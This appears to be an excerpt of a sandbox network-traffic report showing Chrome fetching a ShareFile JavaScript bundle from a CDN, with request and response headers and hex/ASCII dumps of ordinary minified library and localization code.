                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 6d 65 3a 22 2f 22 3d 3d 3d 6e 2e 70 61 74 68 6e 61 6d 65 2e 63 68 61 72 41 74 28 30 29 3f 6e 2e 70 61 74 68 6e 61 6d 65 3a 22 2f 22 2b 6e 2e 70 61 74 68 6e 61 6d 65 7d 7d 72 65 74 75 72 6e 20 65 3d 6f 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 72 2e 69 73 53 74 72 69 6e 67 28 74 29 3f 6f 28 74 29 3a 74 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 65 2e 70 72 6f 74 6f 63 6f 6c 26 26 6e 2e 68 6f 73 74 3d 3d 3d 65 2e 68 6f 73 74 7d 7d 28 29 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 30 7d 7d 2c 36 30 31 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 34 38 36 37 29 3b 65 2e 65 78 70 6f 72 74 73 3d
                                                                                                                                                                                                                      Data Ascii: me:"/"===n.pathname.charAt(0)?n.pathname:"/"+n.pathname}}return e=o(window.location.href),function(t){var n=r.isString(t)?o(t):t;return n.protocol===e.protocol&&n.host===e.host}}():function(){return!0}},6016:(e,t,n)=>{"use strict";var r=n(4867);e.exports=
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 2c 70 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 66 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 2c 6d 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 68 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 2c 6e 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 7b 69 66 28 68 29 7b 76 61 72 20 72 3d 6d 28 74 29 3b 72 26 26 72 21 3d 3d 68 26 26 67 28 65 2c 72 2c 6e 29 7d 76 61 72 20 6f 3d 64 28 74 29 3b 70 26 26 28 6f 3d 6f 2e 63 6f 6e 63 61 74 28 70 28 74 29 29 29 3b 66 6f 72 28 76 61 72
                                                                                                                                                                                                                      Data Ascii: getOwnPropertyNames,p=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,m=Object.getPrototypeOf,h=Object.prototype;e.exports=function g(e,t,n){if("string"!=typeof t){if(h){var r=m(t);r&&r!==h&&g(e,r,n)}var o=d(t);p&&(o=o.concat(p(t)));for(var
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 32 32 35 31 29 2c 6e 28 36 31 30 36 29 29 3a 28 6f 3d 5b 6e 28 33 31 33 32 29 2c 6e 28 32 32 35 31 29 2c 6e 28 36 31 30 36 29 5d 2c 28 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 72 3d 73 29 3f 72 2e 61 70 70 6c 79 28 74 2c 6f 29 3a 72 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 69 29 29 7d 28 30 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 72 26 26 72 2e 55 52 49 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 3d 31 3b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 69 29 29 72 65 74 75 72 6e 20 6e 3f 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74
                                                                                                                                                                                                                      Data Ascii: 2251),n(6106)):(o=[n(3132),n(2251),n(6106)],(i="function"==typeof(r=s)?r.apply(t,o):r)===undefined||(e.exports=i))}(0,(function(e,t,n,r){"use strict";var o=r&&r.URI;function i(e,t){var n=arguments.length>=1;if(!(this instanceof i))return n?arguments.lengt
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 65 3d 65 2e 72 65 70 6c 61 63 65 28 2f 3a 28 5c 2f 5c 2f 29 3f 24 2f 2c 22 22 29 29 2e 6d 61 74 63 68 28 69 2e 70 72 6f 74 6f 63 6f 6c 5f 65 78 70 72 65 73 73 69 6f 6e 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 50 72 6f 74 6f 63 6f 6c 20 22 27 2b 65 2b 22 5c 22 20 63 6f 6e 74 61 69 6e 73 20 63 68 61 72 61 63 74 65 72 73 20 6f 74 68 65 72 20 74 68 61 6e 20 5b 41 2d 5a 30 2d 39 2e 2b 2d 5d 20 6f 72 20 64 6f 65 73 6e 27 74 20 73 74 61 72 74 20 77 69 74 68 20 5b 41 2d 5a 5d 22 29 3b 72 65 74 75 72 6e 20 78 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 29 7d 2c 61 2e 73 63 68 65 6d 65 3d 61 2e 70 72 6f 74 6f 63 6f 6c 2c 61 2e 70 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 70 61 72 74 73 2e
                                                                                                                                                                                                                      Data Ascii: e=e.replace(/:(\/\/)?$/,"")).match(i.protocol_expression))throw new TypeError('Protocol "'+e+"\" contains characters other than [A-Z0-9.+-] or doesn't start with [A-Z]");return x.call(this,e,t)},a.scheme=a.protocol,a.port=function(e,t){return this._parts.
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 63 6f 64 65 3a 45 2c 65 6e 63 6f 64 65 3a 49 7d 2c 64 65 63 6f 64 65 3a 7a 2c 65 6e 63 6f 64 65 3a 54 2c 74 6f 41 53 43 49 49 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 43 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 76 2e 74 65 73 74 28 65 29 3f 22 78 6e 2d 2d 22 2b 54 28 65 29 3a 65 7d 29 29 7d 2c 74 6f 55 6e 69 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 43 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 67 2e 74 65 73 74 28 65 29 3f 7a 28 65 2e 73 6c 69 63 65 28 34 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3a 65 7d 29 29 7d 7d 2c 28 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2e 63 61 6c 6c 28 74 2c 6e 2c 74 2c 65 29 29 3d 3d 3d 75 6e
                                                                                                                                                                                                                      Data Ascii: code:E,encode:I},decode:z,encode:T,toASCII:function(e){return C(e,(function(e){return v.test(e)?"xn--"+T(e):e}))},toUnicode:function(e){return C(e,(function(e){return g.test(e)?z(e.slice(4).toLowerCase()):e}))}},(r=function(){return a}.call(t,n,t,e))===un
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 63 74 6f 72 3d 33 32 5d 3d 22 42 6f 78 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 44 72 6f 70 62 6f 78 43 6f 6e 6e 65 63 74 6f 72 3d 36 34 5d 3d 22 44 72 6f 70 62 6f 78 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 4f 6e 65 44 72 69 76 65 43 6f 6e 6e 65 63 74 6f 72 3d 31 32 38 5d 3d 22 4f 6e 65 44 72 69 76 65 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 47 6f 6f 67 6c 65 44 72 69 76 65 43 6f 6e 6e 65 63 74 6f 72 3d 32 35 36 5d 3d 22 47 6f 6f 67 6c 65 44 72 69 76 65 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 45 78 63 68 61 6e 67 65 43 6f 6e 6e 65 63 74 6f 72 3d 35 31 32 5d 3d 22 45 78 63 68 61 6e 67 65 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 47 65 6e 65 72 69 63 43 6f 6e 6e 65 63 74 6f 72 3d 31 30 32 34 5d 3d 22 47 65 6e 65 72 69 63 43 6f 6e 6e 65
                                                                                                                                                                                                                      Data Ascii: ctor=32]="BoxConnector",e[e.DropboxConnector=64]="DropboxConnector",e[e.OneDriveConnector=128]="OneDriveConnector",e[e.GoogleDriveConnector=256]="GoogleDriveConnector",e[e.ExchangeConnector=512]="ExchangeConnector",e[e.GenericConnector=1024]="GenericConne
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 66 20 53 79 6d 62 6f 6c 26 26 6e 75 6c 6c 21 3d 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 6e 75 6c 6c 21 3d 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 29 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 28 65 2c 74 29 7b 69 66 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 74 65 28 65 2c 74 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 72 65 74 75 72 6e 22 4f 62 6a 65 63 74 22 3d 3d 3d 6e 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 6e 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 2c 22 4d 61 70 22 3d
                                                                                                                                                                                                                      Data Ascii: f Symbol&&null!=e[Symbol.iterator]||null!=e["@@iterator"])return Array.from(e)}function re(e,t){if(e){if("string"==typeof e)return te(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);return"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"=
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 65 74 75 72 6e 21 2f 2d 6d 6f 7a 2d 7c 2d 6d 73 2d 2f 2e 74 65 73 74 28 65 29 7d 29 29 2e 6a 6f 69 6e 28 22 2c 22 29 3b 69 66 28 65 2e 69 6e 64 65 78 4f 66 28 22 57 65 62 6b 69 74 22 29 3e 2d 31 29 72 65 74 75 72 6e 20 75 3b 76 61 72 20 64 3d 63 2e 73 70 6c 69 74 28 2f 2c 28 3f 21 5b 5e 28 29 5d 2a 28 3f 3a 5c 28 5b 5e 28 29 5d 2a 5c 29 29 3f 5c 29 29 2f 67 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 2f 2d 77 65 62 6b 69 74 2d 7c 2d 6d 73 2d 2f 2e 74 65 73 74 28 65 29 7d 29 29 2e 6a 6f 69 6e 28 22 2c 22 29 3b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 22 4d 6f 7a 22 29 3e 2d 31 3f 64 3a 28 69 5b 22 57 65 62 6b 69 74 22 2b 28 30 2c 6f 5b 22 64 65 66 61 75 6c 74 22 5d 29 28 65 29 5d 3d 75 2c 69 5b 22 4d 6f
                                                                                                                                                                                                                      Data Ascii: eturn!/-moz-|-ms-/.test(e)})).join(",");if(e.indexOf("Webkit")>-1)return u;var d=c.split(/,(?![^()]*(?:\([^()]*\))?\))/g).filter((function(e){return!/-webkit-|-ms-/.test(e)})).join(",");return e.indexOf("Moz")>-1?d:(i["Webkit"+(0,o["default"])(e)]=u,i["Mo
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 20 35 35 33 35 3a 63 61 73 65 20 35 34 34 35 3a 63 61 73 65 20 35 37 30 31 3a 63 61 73 65 20 34 39 33 33 3a 63 61 73 65 20 34 36 37 37 3a 63 61 73 65 20 35 35 33 33 3a 63 61 73 65 20 35 37 38 39 3a 63 61 73 65 20 35 30 32 31 3a 63 61 73 65 20 34 37 36 35 3a 69 66 28 67 6e 28 65 29 2d 31 2d 74 3e 36 29 73 77 69 74 63 68 28 6d 6e 28 65 2c 74 2b 31 29 29 7b 63 61 73 65 20 31 30 39 3a 69 66 28 34 35 21 3d 3d 6d 6e 28 65 2c 74 2b 34 29 29 62 72 65 61 6b 3b 63 61 73 65 20 31 30 32 3a 72 65 74 75 72 6e 20 70 6e 28 65 2c 2f 28 2e 2b 3a 29 28 2e 2b 29 2d 28 5b 5e 5d 2b 29 2f 2c 22 24 31 22 2b 57 6e 2b 22 24 32 2d 24 33 24 31 22 2b 55 6e 2b 28 31 30 38 3d 3d 6d 6e 28 65 2c 74 2b 33 29 3f 22 24 33 22 3a 22 24 32 2d 24 33 22 29 29 2b 65 3b 63 61 73 65 20 31 31 35 3a
                                                                                                                                                                                                                      Data Ascii: 5535:case 5445:case 5701:case 4933:case 4677:case 5533:case 5789:case 5021:case 4765:if(gn(e)-1-t>6)switch(mn(e,t+1)){case 109:if(45!==mn(e,t+4))break;case 102:return pn(e,/(.+:)(.+)-([^]+)/,"$1"+Wn+"$2-$3$1"+Un+(108==mn(e,t+3)?"$3":"$2-$3"))+e;case 115:


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      46192.168.2.174976313.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC599OUTGET /sharefile-web/sharefiledev-dc-pilet/1.423.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 197483
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 29 Oct 2024 09:32:16 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:11 GMT
                                                                                                                                                                                                                      ETag: "22848dd2f996ef7b688fbc1ca0d957a1"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 6642832e0f3e501fb9fdc5f35d4351d8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: COk93fUUno7Gmx6CuI1nfJ__TQhQdxFoPNUiI1RInCbw-Ru3CfISkg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 63 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 2c 6c 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdcpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},i={},o={},s={},l={},c={};return Obje
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 76 65 41 73 70 65 63 74 52 61 74 69 6f 7c 70 72 69 6d 69 74 69 76 65 55 6e 69 74 73 7c 72 7c 72 61 64 69 75 73 7c 72 65 66 58 7c 72 65 66 59 7c 72 65 6e 64 65 72 69 6e 67 49 6e 74 65 6e 74 7c 72 65 70 65 61 74 43 6f 75 6e 74 7c 72 65 70 65 61 74 44 75 72 7c 72 65 71 75 69 72 65 64 45 78 74 65 6e 73 69 6f 6e 73 7c 72 65 71 75 69 72 65 64 46 65 61 74 75 72 65 73 7c 72 65 73 74 61 72 74 7c 72 65 73 75 6c 74 7c 72 6f 74 61 74 65 7c 72 78 7c 72 79 7c 73 63 61 6c 65 7c 73 65 65 64 7c 73 68 61 70 65 52 65 6e 64 65 72 69 6e 67 7c 73 6c 6f 70 65 7c 73 70 61 63 69 6e 67 7c 73 70 65 63 75 6c 61 72 43 6f 6e 73 74 61 6e 74 7c 73 70 65 63 75 6c 61 72 45 78 70 6f 6e 65 6e 74 7c 73 70 65 65 64 7c 73 70 72 65 61 64 4d 65 74 68 6f 64 7c 73 74 61 72 74 4f 66 66 73 65 74 7c
                                                                                                                                                                                                                      Data Ascii: veAspectRatio|primitiveUnits|r|radius|refX|refY|renderingIntent|repeatCount|repeatDur|requiredExtensions|requiredFeatures|restart|result|rotate|rx|ry|scale|seed|shapeRendering|slope|spacing|specularConstant|specularExponent|speed|spreadMethod|startOffset|
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 74 4d 3a 28 29 3d 3e 64 2c 75 48 3a 28 29 3d 3e 45 2c 6a 54 3a 28 29 3d 3e 4f 7d 29 3b 76 61 72 20 72 3d 6e 28 38 31 30 39 29 2c 61 3d 6e 28 38 32 32 32 29 2c 69 3d 6e 28 37 38 32 29 3b 63 6c 61 73 73 20 6f 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 2c 6e 2c 72 29 7b 73 75 70 65 72 28 65 29 2c 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 65 2c 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 3d 74 2c 74 68 69 73 2e 73 74 61 74 75 73 3d 6e 2c 74 68 69 73 2e 62 6f 64 79 3d 72 2c 74 68 69 73 2e 73 74 61 74 75 73 3d 6e 75 6c 6c 21 3d 6e 3f 6e 3a 74 2e 73 74 61 74 75 73 7d 7d 76 61 72 20 73 2c 6c 2c 63 2c 75 2c 64 2c 66 2c 70 2c 67 2c 68 3b 21 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: {"use strict";n.d(t,{tM:()=>d,uH:()=>E,jT:()=>O});var r=n(8109),a=n(8222),i=n(782);class o extends Error{constructor(e,t,n,r){super(e),this.message=e,this.response=t,this.status=n,this.body=r,this.status=null!=n?n:t.status}}var s,l,c,u,d,f,p,g,h;!function
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC15259INData Raw: 6e 28 34 34 36 37 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 65 2e 50 72 6f 74 6f 63 6f 6c 3b 28 30 2c 61 2e 41 29 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 65 6e 74 69 74 79 54 79 70 65 3d 74 2c 74 68 69 73 2e 65 6e 74 69 74 79 49 64 3d 6e 2c 74 68 69 73 2e 70 61 72 65 6e 74 52 65 73 6f 75 72 63 65 49 64 3d 72 7d 72 65 74 75 72 6e 28 30 2c 69 2e 41 29 28 65 2c 5b 7b 6b 65 79 3a 22 74 6f 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 70 61 72 65 6e 74 52 65
                                                                                                                                                                                                                      Data Ascii: n(4467),s=function(){function e(t,n){var r=arguments.length>2&&arguments[2]!==undefined?arguments[2]:e.Protocol;(0,a.A)(this,e),this.entityType=t,this.entityId=n,this.parentResourceId=r}return(0,i.A)(e,[{key:"toString",value:function(){var t=this.parentRe
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 6e 67 20 4f 70 74 69 6f 6e 73 22 2c 69 6e 63 72 65 6d 65 6e 74 3a 22 49 6e 63 72 65 6d 65 6e 74 22 2c 69 74 61 6c 69 63 73 3a 22 46 6f 72 6d 61 74 20 49 74 61 6c 69 63 73 22 2c 6a 75 73 74 69 66 79 3a 22 4a 75 73 74 69 66 79 22 2c 6c 65 66 74 3a 22 4c 65 66 74 22 2c 6c 69 6e 6b 3a 22 49 6e 73 65 72 74 20 4c 69 6e 6b 22 2c 72 65 64 6f 3a 22 52 65 64 6f 22 2c 72 69 67 68 74 3a 22 52 69 67 68 74 22 2c 73 68 72 69 6e 6b 3a 22 45 78 69 74 20 66 75 6c 6c 73 63 72 65 65 6e 22 2c 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 22 46 6f 72 6d 61 74 20 53 74 72 69 6b 65 74 68 72 6f 75 67 68 22 2c 73 75 62 73 63 72 69 70 74 3a 22 46 6f 72 6d 61 74 20 53 75 62 73 63 72 69 70 74 22 2c 73 75 70 65 72 73 63 72 69 70 74 3a 22 46 6f 72 6d 61 74 20 53 75 70 65 72 73 63 72 69 70
                                                                                                                                                                                                                      Data Ascii: ng Options",increment:"Increment",italics:"Format Italics",justify:"Justify",left:"Left",link:"Insert Link",redo:"Redo",right:"Right",shrink:"Exit fullscreen",strikethrough:"Format Strikethrough",subscript:"Format Subscript",superscript:"Format Superscrip
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 72 65 61 74 65 20 61 20 54 61 73 6b 22 7d 2c 64 65 6c 65 74 65 46 69 65 6c 64 3a 7b 63 61 6e 63 65 6c 3a 22 43 61 6e 63 65 6c 22 2c 63 6f 6e 74 65 6e 74 3a 22 41 72 65 20 79 6f 75 20 73 75 72 65 20 79 6f 75 20 77 69 73 68 20 74 6f 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 64 65 6c 65 74 65 20 74 68 65 20 74 61 67 73 20 66 69 65 6c 64 3f 22 2c 22 64 65 6c 65 74 65 22 3a 22 44 65 6c 65 74 65 22 2c 74 69 74 6c 65 3a 22 44 65 6c 65 74 65 20 66 69 65 6c 64 22 2c 77 61 72 6e 69 6e 67 49 63 6f 6e 4c 61 62 65 6c 3a 22 57 61 72 6e 69 6e 67 22 7d 2c 64 65 6c 65 74 65 4d 6f 64 61 6c 3a 7b 63 61 6e 63 65 6c 3a 22 43 61 6e 63 65 6c 22 2c 63 6f 6e 74 65 6e 74 3a 22 44 65 6c 65 74 69 6e 67 20 74 68 65 20 7b 7b 74 61 62 4e 61 6d 65 7d 7d 20 74 61 62 20 77 69 6c 6c 20 70 65
                                                                                                                                                                                                                      Data Ascii: reate a Task"},deleteField:{cancel:"Cancel",content:"Are you sure you wish to permanently delete the tags field?","delete":"Delete",title:"Delete field",warningIconLabel:"Warning"},deleteModal:{cancel:"Cancel",content:"Deleting the {{tabName}} tab will pe
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 75 65 22 7d 2c 6d 6f 6e 74 68 3a 7b 70 6c 75 72 61 6c 3a 22 6d 6f 6e 74 68 73 20 6f 76 65 72 64 75 65 22 2c 73 69 6e 67 75 6c 61 72 3a 22 6d 6f 6e 74 68 20 6f 76 65 72 64 75 65 22 7d 2c 77 65 65 6b 3a 7b 70 6c 75 72 61 6c 3a 22 77 65 65 6b 73 20 6f 76 65 72 64 75 65 22 2c 73 69 6e 67 75 6c 61 72 3a 22 77 65 65 6b 20 6f 76 65 72 64 75 65 22 7d 2c 79 65 61 72 3a 7b 70 6c 75 72 61 6c 3a 22 79 65 61 72 73 20 6f 76 65 72 64 75 65 22 2c 73 69 6e 67 75 6c 61 72 3a 22 79 65 61 72 20 6f 76 65 72 64 75 65 22 7d 7d 2c 70 65 72 6d 69 73 73 69 6f 6e 43 6f 6e 66 69 67 3a 7b 64 61 74 61 74 61 62 6c 65 73 3a 7b 63 61 6e 43 72 65 61 74 65 44 61 74 61 54 61 62 6c 65 52 6f 77 73 3a 22 43 61 6e 20 63 72 65 61 74 65 20 64 61 74 61 20 74 61 62 6c 65 20 72 6f 77 73 22 2c 63 61
                                                                                                                                                                                                                      Data Ascii: ue"},month:{plural:"months overdue",singular:"month overdue"},week:{plural:"weeks overdue",singular:"week overdue"},year:{plural:"years overdue",singular:"year overdue"}},permissionConfig:{datatables:{canCreateDataTableRows:"Can create data table rows",ca
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 72 65 74 75 72 6e 7b 6d 6f 6e 74 68 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3f 74 2e 66 6f 72 6d 61 74 28 22 4d 4d 4d 4d 22 29 3a 69 28 65 2c 22 6d 6f 6e 74 68 73 22 29 7d 2c 6d 6f 6e 74 68 73 53 68 6f 72 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3f 74 2e 66 6f 72 6d 61 74 28 22 4d 4d 4d 22 29 3a 69 28 65 2c 22 6d 6f 6e 74 68 73 53 68 6f 72 74 22 2c 22 6d 6f 6e 74 68 73 22 2c 33 29 7d 2c 66 69 72 73 74 44 61 79 4f 66 57 65 65 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 24 6c 6f 63 61 6c 65 28 29 2e 77 65 65 6b 53 74 61 72 74 7c 7c 30 7d 2c 77 65 65 6b 64 61 79 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3f
                                                                                                                                                                                                                      Data Ascii: ction(){var e=this;return{months:function(t){return t?t.format("MMMM"):i(e,"months")},monthsShort:function(t){return t?t.format("MMM"):i(e,"monthsShort","months",3)},firstDayOfWeek:function(){return e.$locale().weekStart||0},weekdays:function(t){return t?
